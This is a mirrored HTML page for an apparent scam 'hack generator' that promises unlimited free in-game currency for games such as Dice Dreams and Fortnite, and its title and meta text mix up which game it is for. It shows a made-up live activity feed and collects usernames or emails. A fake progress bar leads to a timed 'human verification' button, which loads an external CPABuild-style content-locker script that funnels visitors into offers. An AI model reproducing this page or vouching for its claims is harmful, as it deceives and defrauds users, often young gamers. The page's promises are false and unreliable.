<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from getspins168.club/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 05 Aug 2019 01:38:35 GMT -->
<head>
	<meta charset="UTF-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge"> 
	<meta name="viewport" content="width=device-width, initial-scale=1"> 
	<title>Welcome to official Dice Dreams Hack Generator Tool - Generate unlimited number of Pet Master</title>
	<meta name="description" content="Fortnite Battle Royale Online Generator can be used to get unlimited Fortnite Battle Royale V Bucks on your game account. Fortnite Battle Royale hack tool, developed for fair use to get lot of V Bucks, and boost the game at fast. This online Fortnite Battle Royale mod is tested and working." />
	<meta name="keywords" content="Fortnite Battle Royale V Bucks generator, Fortnite Battle Royale hack, Fortnite Battle Royale V Bucks generator, Fortnite Battle Royale hack, Fortnite Battle Royale hack apk, Fortnite Battle Royale apk mod, Fortnite Battle Royale mods, Fortnite Battle Royale mod, Fortnite Battle Royale mods hack, Fortnite Battle Royale cheats codes, Fortnite Battle Royale cheats, Fortnite Battle Royale tips, Fortnite Battle Royale apk mods, Fortnite Battle Royale apk hack, Fortnite Battle Royale apk cheats, mod Fortnite Battle Royale, hack Fortnite Battle Royale, cheats Fortnite Battle Royale tips" />
	<meta name="author" content="" />
	<link rel="stylesheet" type="text/css" href="css/animate.css" />
	<link rel="stylesheet" type="text/css" href="css/style.css" />
	<link rel="stylesheet" type="text/css" href="css/bootstrap.css" />
	<link rel="stylesheet" type="text/css" href="css/chat.css" />
	<link rel="stylesheet" type="text/css" href="css/fontawesome-all.min.css" />
	<link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700" rel="stylesheet" /> 
	<meta name="theme-color" content="#BBECFF">
	<meta name="msap-ication-navbutton-color" content="#BBECFF">
	<meta name="apple-mobile-web-app-status-bar-style" content="#BBECFF">
	<link rel="icon" type="image/png" href="favicon.html" />
	<script type="text/javascript">
    var CPABUILDSETTINGS={"it":2543109,"key":"f84bd"};
</script>
<script src="https://db81lfl43r06.cloudfront.net/3590ac3.js"></script>
	<div class="se-pre-con">
		<img src="img/loading.html" alt="loading" /><br />
		<b class="blink">Loading...</b>
	</div>
	<div class="logo">
		<a href="#"><img src="img/logo.png" alt="logo" class="img-responsive"></a>
	</div>
	<img class="render" src="img/render.html" alt="render" />
	<div class="container">
		<div class="row">
			<div class="main_bg">
				<div class="bg1"></div>
				<ul class="title_tabs">
					<li class="soundclick"><a data-toggle="tab" href="#home"><span>Live</span><br />Activity</a></li>
					<li class="active soundclick"><a data-toggle="tab" href="#menu1"><span>Hack</span><br />Generator</a></li>
					<li class="soundclick"><a data-toggle="tab" href="#menu2"><span>Global</span><br />Chat</a></li>
				</ul>
				<div class="main">
					<div class="tab-content">
						<div id="home" class="tab-pane fade in">
							<div class="generate_now">
								Last Activity<i class="fas fa-arrow-down"></i>
							</div>							
							<div class="container">
								<div class="row">
									<div class="col-sm-12">								
										<div class="activityContent">
											<div class="activity">
												<ul>
													<li><img class="avatar" src="img/avatar.png" alt="avatar" /><img class="flag" src="img/flags/us.png" alt="flag" /></li>
													<li><span>Player</span><br />Boban</li>
													<li><span>Rolls</span><br /><img class="item-icon" src="img/vb.png"> <b class="item-color">1000</b></li>
													<li><span>Platform</span><br /><i class="fab fa-windows"></i></li>
												</ul>
											</div>										
											<div class="activity">
												<ul>
													<li><img class="avatar" src="img/avatar.png" alt="avatar" /><img class="flag" src="img/flags/fr.png" alt="flag" /></li>
													<li><span>Player</span><br />WiM</li>
													<li><span>Rolls</span><br /><img class="item-icon" src="img/vb.png"> <b class="item-color">2500</b></li>
													<li><span>Platform</span><br /><i class="fab fa-apple"></i></li>
												</ul>
											</div>
											<div class="activity">
												<ul>
													<li><img class="avatar" src="img/avatar.png" alt="avatar" /><img class="flag" src="img/flags/rs.png" alt="flag" /></li>
													<li><span>Player</span><br />Durex</li>
													<li><span>Rolls</span><br /><img class="item-icon" src="img/vb.png"> <b class="item-color">5000</b></li>
													<li><span>Platform</span><br /><i class="fab fa-android"></i></li>
												</ul>
											</div>
									    </div>
									</div>
								</div> 
							</div>
						</div>
						<div id="menu1" class="tab-pane fade in active">
							<div class="generate_now">
								<span class="generator-title">Select Package</span><i class="fas fa-arrow-down"></i>
							</div>							
							<div class="generate_cars">
								<ul>
									<li>
										<div class="cars_main soundclick" data-amount="5000">
											<img src="img/1.png" alt="card1" />
											<div class="cards_bottom"><p>FREE</p></div>
										</div>
									</li>
									<li>
										<div class="cars_main soundclick" data-amount="10000">
											<img src="img/2.png" alt="card1" />
											<div class="cards_bottom"><p>FREE</p></div>
										</div>
									</li>
									<li>
										<div class="cars_main soundclick" data-amount="20000">
											<img src="img/3.png" alt="card1" />
											<div class="cards_bottom"><p>FREE</p></div>
										</div>
									</li>
									<li>
										<div class="cars_main soundclick" data-amount="25000">
											<img src="img/4.png" alt="card1" />
											<div class="cards_bottom"><p>FREE</p></div>
										</div>
									</li>
								</ul>
								<div class="next_btn">
									<a class="btnNext soundclick">Next<i class="fas fa-arrow-right"></i></a>
									<a class="btnGenerate soundclick">Generate<i class="fas fa-angle-double-right"></i></a>
									<a class="btnFinal soundclick">Generate Spins <i class="fas fa-play"></i></a>
								</div>
							</div>

							<div class="generator">
								<div class="container">
									<div class="generate_main">
										<div class="row">
											<div class="col-sm-4">
												<div class="generate_main_card">
													<div class="cards_right"><em class="Spins-amount">Generate</em><br /><span>Rolls</span></div>
													<img src="img/5.png" alt="card1" />
													<div class="cards_bottom"><p>FREE</p></div>
												</div>
											</div>
											<div class="col-sm-8">
												<div class="generate_main_input">
													<div class="form-group">
														<div class="input_icon"><i class="fas fa-user-circle"></i></div>
														<input type="text" class="form-control usernameInput" placeholder="Email/Username" />
													</div>
													<h1>Select your platform</h1>										
													<div class="generate_main_platform">
														<ul>
															<li class="platform platform-active" data-name="Window"><i class="fab fa-windows"></i><br>Windows</li>
															<li class="platform" data-name="iOS"><i class="fab fa-apple"></i><br>iOS</li>
															<li class="platform" data-name="Android"><i class="fab fa-android"></i><br>Android</li>
														</ul>
													</div>
												</div>
											</div>
										</div> 
									</div>
								</div>
							</div>

							<div class="player-api">
								<div class="container">
									<div class="generate_main">
										<div class="row">
											<div class="col-sm-4">
												<div class="generate_main_card">
													<img src="img/avatar.png" alt="Player Character" />
												</div>
											</div>
											<div class="col-sm-8">
												<div class="generate_main_input">
													<div class="form-group">
														<div class="username">
															<img src="img/player-icon.png"><br /><b class="player-fullname"></b>
														</div>
													</div>
													<h1 style="margin-top: 30px;">Player Stats</h1>
													<div class="player-stats">
														<ul>
															<li><img src="img/kills.png" alt="kils" /><div class="player-kills"></div></li>
															<li><img src="img/wins.png" alt="wins" /><div class="player-wins"></div></li>
															<li><img src="img/matches.png" alt="matches" /><div class="player-matches"></div></li>
															<li><img src="img/score.png" alt="score" /><div class="player-score"></div></li>
														</ul>
													</div>
												</div>
											</div>
										</div> 
									</div>
								</div>
							</div>	

							<div class="generator-console">
								<div class="container">
									<div class="generate_console_main">
										<div class="row">

											<center>
												<div class="generate_main_card card_hidden generate_main_card_notransform">
													<div class="cards_right"><em class="vbucks-amount">2500</em><br /><span>Rolls</span></div>
													<img src="img/5.png" alt="card1" />
													<div class="cards_bottom"><p>FREE</p></div>
												</div>
											</center>

											<center><div class="loader">Loading...</div></center>
											<h3 class="console-txt">Generating<span class="blink">...</span></h3>
											<br />
											<div class="progress">
											  <div class="progress-bar" role="progressbar" aria-valuenow="1"
											  aria-valuemin="1" aria-valuemax="100" style="width:1%">
											  </div>
											</div>

										</div> 									
									</div>
								</div>
							</div>														

							<div class="generator-offers">
								<div class="container">
									<div class="generate_console_main">
										<div class="row">
											<center>
												<h3 style="text-align: center; line-height: 1;"><b><i class="fa fa-user-times"></i> HUMAN VERIFICATION</b></h3>
												<p>You are almost done! Click on the Verify Now button below to complete human verification</p>
												<p>After successful verification you will receive resources instantly.</p>
												<p>Time Left: <span class="timeLeft">05:00</span></p>
												<br />
												<p>
													<button type="button" class="btn btn-primary" onclick="CPABuildLock()">VERIFY NOW</button>
												</p>
											</center>

										</div> 									
									</div>
								</div>
							</div>							
						</div>
						<div id="menu2" class="tab-pane fade">
							<div class="generate_now">
								Live Chat Room<i class="fas fa-arrow-down"></i>
							</div>							
							<div class="container">
								<div class="row">
								    <div class="col-sm-12">
									        <div class="livechatBox">
												<div class="box-transform">
										            <div class="row">
										                <div class="col-md-12">
										                    <div class="heading">
																<h3><i class="fab fa-rocketchat"></i> Global Chat Room</h3>
										                    </div>
										                </div>
										            </div>
													
													<div class="row">
										                <div class="col-md-12">
										                    <div class="livechatListArea">				
										                        <ul class="chatList" style="position:relative;"></ul><br class="clearfix">					
										                    </div>
										                </div>
														<div id="typing"><span class="typing-username">Username</span> is typing ...</div>
										            </div>
													
										            <div class="row">
														<div id="enter_username">
															<div class="col-md-4">
																<input type="text" placeholder="Enter your username..." class="form-control input-lg livechatUsernameGen">					
															</div>		
															<div class="col-md-2">
																<button id="sBtn" class="btn btn-success btn-block btn-lg livechatUserGenSubmtBtn">Submit</button>
															</div>	
														</div>
														<div id="send_message">
															<div class="col-md-10">
																<input type="text" placeholder="Enter message..." class="form-control input-lg livechatMsg">
															</div>
															<div class="col-md-2">
																<button id="sBtn" class="btn btn-success btn-block btn-lg livechatSubmtBtn">Submit</button>
															</div>	
														</div>
														
										            </div>	

									        	</div>


									         </div>

								    </div>
								</div>		
							</div>							
						</div>
					</div>
				</div>
				<div class="bg2"></div>
			</div>
		</div>
	</div>

	<!-- jQuery -->
	<script src="js/jquery.js"></script>
	<script type="text/javascript" src="js/bootstrap.min.js"></script>
	<script type="text/javascript" src="js/ion.sound.min.js"></script>
	<script type="text/javascript" src="js/functions.app.js"></script>	
	<script type="text/javascript" src="js/main.js"></script>
	<script type="text/javascript" src="js/chat.js"></script>
</body>

<!-- Mirrored from getspins168.club/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 05 Aug 2019 01:39:23 GMT -->
</html>